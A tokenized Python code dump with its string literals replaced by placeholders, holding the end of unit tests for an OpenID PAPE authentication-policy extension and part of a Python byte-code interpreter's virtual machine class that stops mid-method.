nist_auth_level ) <EOL> def test_add_policy_uri ( self ) : <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> self . resp . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , self . resp . auth_policies ) <EOL> self . resp . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR ] , self . resp . auth_policies ) <EOL> self . resp . addPolicyURI ( pape . AUTH_PHISHING_RESISTANT ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_PHISHING_RESISTANT ] , <EOL> self . resp . auth_policies ) <EOL> self . resp . addPolicyURI ( pape . AUTH_MULTI_FACTOR ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR , <EOL> pape . AUTH_PHISHING_RESISTANT ] , <EOL> self . resp . auth_policies ) <EOL> self . assertRaises ( RuntimeError , self . resp . addPolicyURI , <EOL> pape . AUTH_NONE ) <EOL> def test_getExtensionArgs ( self ) : <EOL> self . assertEqual ( { '<STR_LIT>' : pape . AUTH_NONE } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> self . resp . addPolicyURI ( '<STR_LIT>' ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> self . resp . addPolicyURI ( '<STR_LIT>' ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> self . resp . auth_time = "<STR_LIT>" <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> self . resp . setAuthLevel ( pape . LEVELS_NIST , '<STR_LIT:3>' ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : pape . LEVELS_NIST } , <EOL> self . resp . getExtensionArgs ( ) ) <EOL> def test_getExtensionArgs_error_auth_age ( self ) : <EOL> self . resp . auth_time = "<STR_LIT>" <EOL> self . assertRaises ( ValueError , self . 
resp . getExtensionArgs ) <EOL> def test_parseExtensionArgs ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False ) <EOL> self . assertEqual ( '<STR_LIT>' , self . resp . auth_time ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_valid_none ( self ) : <EOL> args = { '<STR_LIT>' : pape . AUTH_NONE } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False ) <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_old_none ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT:none>' } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False ) <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_old_none_strict ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT:none>' } <EOL> self . assertRaises ( <EOL> ValueError , <EOL> self . resp . parseExtensionArgs , args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_empty ( self ) : <EOL> self . resp . parseExtensionArgs ( { } , is_openid1 = False ) <EOL> self . assertEqual ( None , self . resp . auth_time ) <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_empty_strict ( self ) : <EOL> self . assertRaises ( <EOL> ValueError , <EOL> self . resp . parseExtensionArgs , { } , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_ignore_superfluous_none ( self ) : <EOL> policies = [ pape . AUTH_NONE , pape . AUTH_MULTI_FACTOR_PHYSICAL ] <EOL> args = { <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policies ) , <EOL> } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False , strict = False ) <EOL> self . assertEqual ( [ pape . AUTH_MULTI_FACTOR_PHYSICAL ] , <EOL> self . resp . 
auth_policies ) <EOL> def test_parseExtensionArgs_none_strict ( self ) : <EOL> policies = [ pape . AUTH_NONE , pape . AUTH_MULTI_FACTOR_PHYSICAL ] <EOL> args = { <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policies ) , <EOL> } <EOL> self . assertRaises ( ValueError , self . resp . parseExtensionArgs , <EOL> args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_strict_bogus1 ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertRaises ( ValueError , self . resp . parseExtensionArgs , <EOL> args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_openid1_strict ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : pape . AUTH_NONE , <EOL> } <EOL> self . resp . parseExtensionArgs ( args , strict = True , is_openid1 = True ) <EOL> self . assertEqual ( '<STR_LIT:0>' , self . resp . getAuthLevel ( pape . LEVELS_NIST ) ) <EOL> self . assertEqual ( [ ] , self . resp . auth_policies ) <EOL> def test_parseExtensionArgs_strict_no_namespace_decl_openid2 ( self ) : <EOL> args = { '<STR_LIT>' : pape . AUTH_NONE , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> self . assertRaises ( ValueError , self . resp . parseExtensionArgs , <EOL> args , is_openid1 = False , strict = True ) <EOL> def test_parseExtensionArgs_nostrict_no_namespace_decl_openid2 ( self ) : <EOL> args = { '<STR_LIT>' : pape . AUTH_NONE , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False , strict = False ) <EOL> self . assertRaises ( KeyError , self . resp . getAuthLevel , <EOL> pape . LEVELS_NIST ) <EOL> def test_parseExtensionArgs_strict_good ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : pape . LEVELS_NIST } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False , strict = True ) <EOL> self . 
assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . resp . auth_policies ) <EOL> self . assertEqual ( '<STR_LIT>' , self . resp . auth_time ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . resp . nist_auth_level ) <EOL> def test_parseExtensionArgs_nostrict_bogus ( self ) : <EOL> args = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . resp . parseExtensionArgs ( args , is_openid1 = False ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> self . resp . auth_policies ) <EOL> self . assertEqual ( None , self . resp . auth_time ) <EOL> self . assertEqual ( None , self . resp . nist_auth_level ) <EOL> def test_fromSuccessResponse ( self ) : <EOL> policy_uris = [ pape . AUTH_MULTI_FACTOR , pape . AUTH_PHISHING_RESISTANT ] <EOL> openid_req_msg = Message . fromOpenIDArgs ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : OPENID2_NS , <EOL> '<STR_LIT>' : pape . ns_uri , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policy_uris ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> signed_stuff = { <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( policy_uris ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> oid_req = DummySuccessResponse ( openid_req_msg , signed_stuff ) <EOL> req = pape . Response . fromSuccessResponse ( oid_req ) <EOL> self . assertEqual ( policy_uris , req . auth_policies ) <EOL> self . assertEqual ( '<STR_LIT>' , req . auth_time ) <EOL> def test_fromSuccessResponseNoSignedArgs ( self ) : <EOL> policy_uris = [ pape . AUTH_MULTI_FACTOR , pape . AUTH_PHISHING_RESISTANT ] <EOL> openid_req_msg = Message . fromOpenIDArgs ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : OPENID2_NS , <EOL> '<STR_LIT>' : pape . ns_uri , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . 
join ( policy_uris ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> signed_stuff = { } <EOL> class NoSigningDummyResponse ( DummySuccessResponse ) : <EOL> def getSignedNS ( self , ns_uri ) : <EOL> return None <EOL> oid_req = NoSigningDummyResponse ( openid_req_msg , signed_stuff ) <EOL> resp = pape . Response . fromSuccessResponse ( oid_req ) <EOL> self . assertTrue ( resp is None ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> import dis <EOL> import inspect <EOL> import linecache <EOL> import logging <EOL> import operator <EOL> import sys <EOL> import six <EOL> from six . moves import reprlib <EOL> PY3 , PY2 = six . PY3 , not six . PY3 <EOL> from . pyobj import Frame , Block , Method , Function , Generator <EOL> log = logging . getLogger ( __name__ ) <EOL> if six . PY3 : <EOL> byteint = lambda b : b <EOL> else : <EOL> byteint = ord <EOL> repr_obj = reprlib . Repr ( ) <EOL> repr_obj . maxother = <NUM_LIT> <EOL> repper = repr_obj . repr <EOL> class VirtualMachineError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class VirtualMachine ( object ) : <EOL> def __init__ ( self ) : <EOL> self . frames = [ ] <EOL> self . frame = None <EOL> self . return_value = None <EOL> self . last_exception = None <EOL> def top ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . frame . stack [ - <NUM_LIT:1> ] <EOL> def pop ( self , i = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> return self . frame . stack . pop ( - <NUM_LIT:1> - i ) <EOL> def push ( self , * vals ) : <EOL> """<STR_LIT>""" <EOL> self . frame . stack . extend ( vals ) <EOL> def popn ( self , n ) : <EOL> """<STR_LIT>""" <EOL> if n : <EOL> ret = self . frame . stack [ - n : ] <EOL> self . frame . stack [ - n : ] = [ ] <EOL> return ret <EOL> else : <EOL> return [ ] <EOL> def peek ( self , n ) : <EOL> """<STR_LIT>""" <EOL> return self . frame . stack [ - n ] <EOL> def jump ( self , jump ) : <EOL> """<STR_LIT>""" <EOL> self . frame . f_lasti = jump <EOL> def push_block ( self , type , handler = None , level = None ) : <EOL> if level is None : <EOL> level = len ( self . frame . stack ) <EOL> self . frame . block_stack . append ( Block ( type , handler , level ) ) <EOL> def pop_block ( self ) : <EOL> return self . frame . block_stack . pop ( ) <EOL> def make_frame ( self , code , callargs = { } , f_globals = None , f_locals = None ) : <EOL> log . 
info ( "<STR_LIT>" % ( code , repper ( callargs ) ) ) <EOL> if f_globals is not None : <EOL> f_globals = f_globals <EOL> if f_locals is None : <EOL> f_locals = f_globals <EOL> elif self . frames : <EOL> f_globals = self . frame . f_globals <EOL> f_locals = { } <EOL> else : <EOL> f_globals = f_locals = { <EOL> '<STR_LIT>' : __builtins__ , <EOL> '<STR_LIT>' : '<STR_LIT:__main__>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> f_locals . update ( callargs ) <EOL> frame = Frame ( code , f_globals , f_locals , self . frame ) <EOL> return frame <EOL> def push_frame ( self , frame ) : <EOL> self . frames . append ( frame ) <EOL> self . frame = frame <EOL> def pop_frame ( self ) : <EOL> self . frames . pop ( ) <EOL> if self . frames : <EOL> self . frame = self . frames [ - <NUM_LIT:1> ] <EOL> else : <EOL> self . frame = None <EOL> def print_frames ( self ) : <EOL> """<STR_LIT>""" <EOL> for f in self . frames : <EOL> filename = f . f_code . co_filename <EOL> lineno = f . line_number ( ) <EOL> print ( '<STR_LIT>' % ( <EOL> filename , lineno , f . f_code . co_name <EOL> ) ) <EOL> linecache . checkcache ( filename ) <EOL> line = linecache . getline ( filename , lineno , f . f_globals ) <EOL> if line : <EOL> print ( '<STR_LIT:U+0020>' + line . strip ( ) ) <EOL> def resume_frame ( self , frame ) : <EOL> frame . f_back = self . frame <EOL> val = self . run_frame ( frame ) <EOL> frame . f_back = None <EOL> return val <EOL> def run_code ( self , code , f_globals = None , f_locals = None ) : <EOL> frame = self . make_frame ( code , f_globals = f_globals , f_locals = f_locals ) <EOL> val = self . run_frame ( frame ) <EOL> if self . frames : <EOL> raise VirtualMachineError ( "<STR_LIT>" ) <EOL> if self . frame and self . frame . stack : <EOL> raise VirtualMachineError ( "<STR_LIT>" % self . frame . stack ) <EOL> return val <EOL> def unwind_block ( self , block ) : <EOL> if block . 
type == '<STR_LIT>' : <EOL> offset = <NUM_LIT:3> <EOL> else : <EOL> offset = <NUM_LIT:0> <EOL> while len ( self . frame . stack ) > block . level + offset : <EOL> self . pop ( ) <EOL> if block . type == '<STR_LIT>' : <EOL> tb , value , exctype = self . popn ( <NUM_LIT:3> ) <EOL> self . last_exception = exctype , value , tb <EOL> def parse_byte_and_args ( self ) : <EOL> """<STR_LIT>""" <EOL> f = self . frame <EOL> opoffset = f . f_lasti <EOL> byteCode = byteint ( f . f_code . co_code [ opoffset ] ) <EOL> f . f_lasti += <NUM_LIT:1> <EOL> byteName = dis . opname [ byteCode ] <EOL> arg = None <EOL> arguments = [ ] <EOL> if byteCode >= dis . HAVE_ARGUMENT : <EOL> arg = f . f_code . co_code [ f . f_lasti : f . f_lasti + <NUM_LIT:2> ] <EOL> f . f_lasti += <NUM_LIT:2> <EOL> intArg = byteint ( arg [ <NUM_LIT:0> ] ) + ( byteint ( arg [ <NUM_LIT:1> ] ) << <NUM_LIT:8> ) <EOL> if byteCode in dis . hasconst : <EOL> arg = f . f_code . co_consts [ intArg ] <EOL> elif byteCode in dis . hasfree : <EOL> if intArg < len ( f . f_code . co_cellvars ) : <EOL> arg = f . f_code . co_cellvars [ intArg ] <EOL> else : <EOL> var_idx = intArg - len ( f . f_code . co_cellvars ) <EOL> arg = f . f_code . co_freevars [ var_idx ] <EOL> elif byteCode in dis . hasname : <EOL> arg = f . f_code . co_names [ intArg ] <EOL> elif byteCode in dis . hasjrel : <EOL> arg = f . f_lasti + intArg <EOL> elif byteCode in dis . hasjabs : <EOL> arg = intArg <EOL> elif byteCode in dis . haslocal : <EOL> arg = f . f_code . co_varnames [ intArg ] <EOL> else : <EOL> arg = intArg <EOL> arguments = [ arg ] <EOL> return byteName , arguments , opoffset <EOL> def log ( self , byteName , arguments , opoffset ) : <EOL> """<STR_LIT>""" <EOL> op = "<STR_LIT>" % ( opoffset , byteName ) <EOL> if arguments : <EOL> op += "<STR_LIT>" % ( arguments [ <NUM_LIT:0> ] , ) <EOL> indent = "<STR_LIT:U+0020>" * ( len ( self . frames ) - <NUM_LIT:1> ) <EOL> stack_rep = repper ( self . frame . stack ) <EOL> block_stack_rep = repper ( self . 
frame . block_stack ) <EOL> log . info ( "<STR_LIT>" % ( indent , stack_rep ) ) <EOL> log . info ( "<STR_LIT>" % ( indent , block_stack_rep ) ) <EOL> log . info ( "<STR_LIT>" % ( indent , op ) ) <EOL> def dispatch ( self , byteName , arguments ) : <EOL> """<STR_LIT>""" <EOL> why = None <EOL> try : <EOL> if byteName . startswith ( '<STR_LIT>' ) : <EOL> self . unaryOperator ( byteName [ <NUM_LIT:6> : ] ) <EOL> elif byteName . startswith ( '<STR_LIT>' ) : <EOL> self . binaryOperator ( byteName [ <NUM_LIT:7> : ] ) <EOL> elif byteName . startswith ( '<STR_LIT>' ) : <EOL> self . inplaceOperator ( byteName [ <NUM_LIT:8> : ] ) <EOL> elif '<STR_LIT>' in byteName : <EOL> self . sliceOperator ( byteName ) <EOL> else : <EOL> bytecode_fn = getattr ( self , '<STR_LIT>' % byteName , None ) <EOL> if not bytecode_fn : <EOL> raise VirtualMachineError ( <EOL> "<STR_LIT>" % byteName <EOL> ) <EOL> why = bytecode_fn ( * arguments ) <EOL> except : <EOL> self . last_exception = sys . exc_info ( ) [ : <NUM_LIT:2> ] + ( None , ) <EOL> log . exception ( "<STR_LIT>" ) <EOL> why = '<STR_LIT>' <EOL> return why <EOL> def manage_block_stack ( self , why ) : <EOL> """<STR_LIT>""" <EOL> assert why != '<STR_LIT>' <EOL> block = self . frame . block_stack [ - <NUM_LIT:1> ] <EOL> if block . type == '<STR_LIT>' and why == '<STR_LIT>' : <EOL> self . jump ( self . return_value ) <EOL> why = None <EOL> return why <EOL> self . pop_block ( ) <EOL> self . unwind_block ( block ) <EOL> if block . type == '<STR_LIT>' and why == '<STR_LIT>' : <EOL> why = None <EOL> self . jump ( block . handler ) <EOL> return why <EOL> if PY2 : <EOL> if ( <EOL> block . type == '<STR_LIT>' or <EOL> ( block . type == '<STR_LIT>' and why == '<STR_LIT>' ) or <EOL> block . type == '<STR_LIT>' <EOL> ) : <EOL> if why == '<STR_LIT>' : <EOL> exctype , value , tb = self . last_exception <EOL> self . push ( tb , value , exctype ) <EOL> else : <EOL> if why in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . push ( self . 
return_value ) <EOL> self . push ( why ) <EOL> why = None <EOL> self . jump ( block . handler ) <EOL> return why <EOL> elif PY3 : <EOL> if ( <EOL> why == '<STR_LIT>' and <EOL> block . type in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) : <EOL> self . push_block ( '<STR_LIT>' ) <EOL> exctype , value , tb = self . last_exception <EOL> self . push ( tb , value , exctype ) <EOL> self . push ( tb , value , exctype ) <EOL> why = None <EOL> self . jump ( block . handler ) <EOL> return why <EOL> elif block . type == '<STR_LIT>' : <EOL> if why in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . push ( self . return_value ) <EOL> self . push ( why ) <EOL> why = None <EOL> self . jump ( block . handler ) <EOL> return why <EOL> return why <EOL> def run_frame ( self , frame ) : <EOL> """<STR_LIT>""" <EOL> self . push_frame ( frame ) <EOL> while True : <EOL> byteName , arguments , opoffset = self . parse_byte_and_args ( ) <EOL> if log . isEnabledFor ( logging . INFO ) : <EOL> self . log ( byteName , arguments , opoffset ) <EOL> why = self . dispatch ( byteName , arguments ) <EOL> if why == '<STR_LIT>' : <EOL> pass <EOL> if why == '<STR_LIT>' : <EOL> why = '<STR_LIT>' <EOL> if why != '<STR_LIT>' : <EOL> while why and frame . block_stack : <EOL> why = self . manage_block_stack ( why ) <EOL> if why : <EOL> break <EOL> self . pop_frame ( ) <EOL> if why == '<STR_LIT>' : <EOL> six . reraise ( * self . last_exception ) <EOL> return self . return_value <EOL> def byte_LOAD_CONST ( self , const ) : <EOL> self . push ( const ) <EOL> def byte_POP_TOP ( self ) : <EOL> self . pop ( ) <EOL> def byte_DUP_TOP ( self ) : <EOL> self . push ( self . top ( ) ) <EOL> def byte_DUP_TOPX ( self , count ) : <EOL> items = self . popn ( count ) <EOL> for i in [ <NUM_LIT:1> , <NUM_LIT:2> ] : <EOL> self . push ( * items ) <EOL> def byte_DUP_TOP_TWO ( self ) : <EOL> a , b = self . popn ( <NUM_LIT:2> ) <EOL> self . push ( a , b , a , b ) <EOL> def byte_ROT_TWO ( self ) : <EOL> a , b = self . 
popn ( <NUM_LIT:2> ) <EOL> self . push ( b , a ) <EOL> def byte_ROT_THREE ( self ) : <EOL> a , b , c = self . popn ( <NUM_LIT:3> ) <EOL> self . push ( c , a , b ) <EOL> def byte_ROT_FOUR ( self ) : <EOL> a , b , c , d = self . popn ( <NUM_LIT:4> ) <EOL> self . push ( d , a , b , c ) <EOL> def byte_LOAD_NAME ( self , name ) : <EOL> frame = self . frame <EOL> if name in frame . f_locals : <EOL> val = frame . f_locals [ name ] <EOL> elif name in frame . f_globals : <EOL> val = frame . f_globals [ name ] <EOL> elif name in frame . f_builtins : <EOL> val = frame . f_builtins [ name ] <EOL> else : <EOL> raise NameError ( "<STR_LIT>" % name ) <EOL> self . push ( val ) <EOL> def byte_STORE_NAME ( self , name ) : <EOL> self . frame . f_locals [ name ] = self . pop ( ) <EOL> def byte_DELETE_NAME ( self , name ) : <EOL> del self . frame . f_locals [ name ] <EOL> def byte_LOAD_FAST ( self , name ) : <EOL> if name in self . frame . f_locals : <EOL> val = self . frame . f_locals [ name ] <EOL> else : <EOL> raise UnboundLocalError ( <EOL> "<STR_LIT>" % name <EOL> ) <EOL> self . push ( val ) <EOL> def byte_STORE_FAST ( self , name ) : <EOL> self . frame . f_locals [ name ] = self . pop ( ) <EOL> def byte_DELETE_FAST ( self , name ) : <EOL> del self . frame . f_locals [ name ] <EOL> def byte_LOAD_GLOBAL ( self , name ) : <EOL> f = self . frame <EOL> if name in f . f_globals : <EOL> val = f . f_globals [ name ] <EOL> elif name in f . f_builtins : <EOL> val = f . f_builtins [ name ] <EOL> else : <EOL> raise NameError ( "<STR_LIT>" % name ) <EOL> self . push ( val ) <EOL> def byte_LOAD_DEREF ( self , name ) : <EOL> self . push ( self . frame . cells [ name ] . get ( ) ) <EOL> def byte_STORE_DEREF ( self , name ) : <EOL> self . frame . cells [ name ] . set ( self . pop ( ) ) <EOL> def byte_LOAD_LOCALS ( self ) : <EOL> self . push ( self . frame . f_locals ) <EOL> UNARY_OPERATORS = { <EOL> '<STR_LIT>' : operator . pos , <EOL> '<STR_LIT>' : operator . neg , <EOL> '<STR_LIT>' : operator . 
not_ , <EOL> '<STR_LIT>' : repr , <EOL> '<STR_LIT>' : operator . invert , <EOL> } <EOL> def unaryOperator ( self , op ) : <EOL> x = self . pop ( ) <EOL> self . push ( self . UNARY_OPERATORS [ op ] ( x ) ) <EOL> BINARY_OPERATORS = { <EOL> '<STR_LIT>' : pow , <EOL> '<STR_LIT>' : operator . mul , <EOL> '<STR_LIT>' : getattr ( operator , '<STR_LIT>' , lambda x , y : None ) , <EOL> '<STR_LIT>' : operator . floordiv , <EOL> '<STR_LIT>' : operator . truediv , <EOL> '<STR_LIT>' : operator . mod , <EOL> '<STR_LIT>' : operator . add , <EOL> '<STR_LIT>' : operator . sub , <EOL> '<STR_LIT>' : operator . getitem , <EOL> '<STR_LIT>' : operator . lshift , <EOL> '<STR_LIT>' : operator . rshift , <EOL> '<STR_LIT>' : operator . and_ , <EOL> '<STR_LIT>' : operator . xor , <EOL> '<STR_LIT>' : operator . or_ , <EOL> } <EOL> def binaryOperator ( self , op ) : <EOL> x , y = self . popn ( <NUM_LIT:2> ) <EOL> self . push ( self . BINARY_OPERATORS [ op ] ( x , y ) ) <EOL> def inplaceOperator ( self , op ) : <EOL> x , y = self . popn ( <NUM_LIT:2> ) <EOL> if op == '<STR_LIT>' : <EOL> x **= y <EOL> elif op == '<STR_LIT>' : <EOL> x *= y <EOL> elif op in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> x //= y <EOL> elif op == '<STR_LIT>' : <EOL> x /= y <EOL> elif op == '<STR_LIT>' : <EOL> x %= y <EOL> elif op == '<STR_LIT>' : <EOL> x += y <EOL> elif op == '<STR_LIT>' : <EOL> x -= y <EOL> elif op == '<STR_LIT>' : <EOL> x <<= y <EOL> elif op == '<STR_LIT>' : <EOL> x >>= y <EOL> elif op == '<STR_LIT>' : <EOL> x &= y <EOL> elif op == '<STR_LIT>' : <EOL> x ^= y <EOL> elif op == '<STR_LIT>' : <EOL> x |= y <EOL> else : <EOL> raise VirtualMachineError ( "<STR_LIT>" % op ) <EOL> self . push ( x ) <EOL> def sliceOperator ( self , op ) : <EOL> start = <NUM_LIT:0> <EOL> end = None <EOL> op , count = op [ : - <NUM_LIT:2> ] , int ( op [ - <NUM_LIT:1> ] ) <EOL> if count == <NUM_LIT:1> : <EOL> start = self . pop ( ) <EOL> elif count == <NUM_LIT:2> : <EOL> end = self . 
pop ( ) <EOL> elif count == <NUM_LIT:3> : <EOL> end = self . pop ( ) <EOL> start = self . pop ( ) <EOL> l = self . pop ( ) <EOL> if end is None : <EOL> end = len ( l ) <EOL> if op . startswith ( '<STR_LIT>' ) : <EOL> l [ start : end ] = self . pop ( ) <EOL> elif op . startswith ( '<STR_LIT>' ) : <EOL> del l [ start : end ] <EOL> else : <EOL> self . push ( l [ start : end ] ) <EOL> COMPARE_OPERATORS = [ <EOL> operator . lt , <EOL> operator . le , <EOL> operator . eq , <EOL> operator . ne , <EOL> operator . gt , <EOL> operator . ge , <EOL> lambda x , y : x in y , <EOL> lambda x , y : x not in y , <EOL> lambda x , y : x is y , <EOL> lambda x , y : x is not y , <EOL> lambda x , y : issubclass ( x , Exception ) and issubclass ( x , y ) , <EOL> ] <EOL> def byte_COMPARE_OP ( self , opnum ) : <EOL> x , y = self . popn ( <NUM_LIT:2> ) <EOL> self . push ( self . COMPARE_OPERATORS [ opnum ] ( x , y ) ) <EOL> def byte_LOAD_ATTR ( self , attr ) : <EOL> obj = self . pop ( ) <EOL> val = getattr ( obj , attr ) <EOL> self . push ( val ) <EOL> def byte_STORE_ATTR ( self , name ) : <EOL> val , obj = self . popn ( <NUM_LIT:2> ) <EOL> setattr ( obj , name , val ) <EOL> def byte_DELETE_ATTR ( self , name ) : <EOL> obj = self . pop ( ) <EOL> delattr ( obj , name ) <EOL> def byte_STORE_SUBSCR ( self ) : <EOL> val , obj , subscr = self . popn ( <NUM_LIT:3> ) <EOL> obj [ subscr ] = val <EOL> def byte_DELETE_SUBSCR ( self ) : <EOL> obj , subscr = self . popn ( <NUM_LIT:2> ) <EOL> del obj [ subscr ] <EOL> def byte_BUILD_TUPLE ( self , count ) : <EOL> elts = self . popn ( count ) <EOL> self . push ( tuple ( elts ) ) <EOL> def byte_BUILD_LIST ( self , count ) : <EOL> elts = self . popn ( count ) <EOL> self . push ( elts ) <EOL> def byte_BUILD_SET ( self , count ) : <EOL> elts = self . popn ( count ) <EOL> self . push ( set ( elts ) ) <EOL> def byte_BUILD_MAP ( self , size ) : <EOL> self . push ( { } ) <EOL> def byte_STORE_MAP ( self ) : <EOL> the_map , val , key = self . 
popn ( <NUM_LIT:3> ) <EOL> the_map [ key ] = val <EOL> self . push ( the_map ) <EOL> def byte_UNPACK_SEQUENCE ( self , count ) : <EOL> seq = self . pop ( ) <EOL> for x in reversed ( seq ) : <EOL> self . push ( x ) <EOL> def byte_BUILD_SLICE ( self , count ) : <EOL> if count == <NUM_LIT:2> : <EOL> x , y = self . popn ( <NUM_LIT:2> ) <EOL> self . push ( slice ( x , y ) ) <EOL> elif count == <NUM_LIT:3> : <EOL> x , y , z = self . popn ( <NUM_LIT:3> ) <EOL> self . push ( slice ( x , y , z ) ) <EOL> else : <EOL> raise VirtualMachineError ( "<STR_LIT>" % count ) <EOL> def byte_LIST_APPEND ( self , count ) : <EOL> val = self . pop ( ) <EOL> the_list = self . peek ( count ) <EOL> the_list . append ( val ) <EOL> def byte_SET_ADD ( self , count ) : <EOL> val = self . pop ( ) <EOL> the_set = self . peek ( count ) <EOL> the_set . add ( val ) <EOL> def byte_MAP_ADD ( self , count ) : <EOL> val , key = self . popn ( <NUM_LIT:2> ) <EOL> the_map = self . peek ( count ) <EOL> the_map [ key ] = val <EOL> if <NUM_LIT:0> : <EOL> def byte_PRINT_EXPR ( self ) : <EOL> print ( self . pop ( ) ) <EOL> def byte_PRINT_ITEM ( self ) : <EOL> item = self . pop ( ) <EOL> self . print_item ( item ) <EOL> def byte_PRINT_ITEM_TO ( self ) : <EOL> to = self . pop ( ) <EOL> item = self . pop ( ) <EOL> self . print_item ( item , to ) <EOL> def byte_PRINT_NEWLINE ( self ) : <EOL> self . print_newline ( ) <EOL> def byte_PRINT_NEWLINE_TO ( self ) : <EOL> to = self . pop ( ) <EOL> self . print_newline ( to ) <EOL> def print_item ( self , item , to = None ) : <EOL> if to is None : <EOL> to = sys . stdout <EOL> if to . softspace : <EOL> print ( "<STR_LIT:U+0020>" , end = "<STR_LIT>" , file = to ) <EOL> to . softspace = <NUM_LIT:0> <EOL> print ( item , end = "<STR_LIT>" , file = to ) <EOL> if isinstance ( item , str ) : <EOL> if ( not item ) or ( not item [ - <NUM_LIT:1> ] . isspace ( ) ) or ( item [ - <NUM_LIT:1> ] == "<STR_LIT:U+0020>" ) : <EOL> to . softspace = <NUM_LIT:1> <EOL> else : <EOL> to . 
softspace = <NUM_LIT:1> <EOL> def print_newline ( self , to = None ) : <EOL> if to is None : <EOL> to = sys . stdout <EOL> print ( "<STR_LIT>" , file = to ) <EOL> to . softspace = <NUM_LIT:0> <EOL> def byte_JUMP_FORWARD ( self , jump ) : <EOL> self . jump ( jump ) <EOL> def byte_JUMP_ABSOLUTE ( self , jump ) : <EOL> self . jump ( jump ) <EOL> if <NUM_LIT:0> : <EOL> def byte_JUMP_IF_TRUE ( self , jump ) : <EOL> val = self . top ( ) <EOL> if val : <EOL> self . jump ( jump ) <EOL> def byte_JUMP_IF_FALSE ( self , jump ) : <EOL> val = self . top ( ) <EOL> if not val : <EOL> self . jump ( jump ) <EOL> def byte_POP_JUMP_IF_TRUE ( self , jump ) : <EOL> val = self . pop ( ) <EOL> if val : <EOL> self . jump ( jump ) <EOL> def byte_POP_JUMP_IF_FALSE ( self , jump ) : <EOL> val = self . pop ( ) <EOL> if not val : <EOL> self . jump ( jump ) <EOL> def byte_JUMP_IF_TRUE_OR_POP ( self , jump ) : <EOL> val = self . top ( ) <EOL> if val : <EOL> self . jump ( jump ) 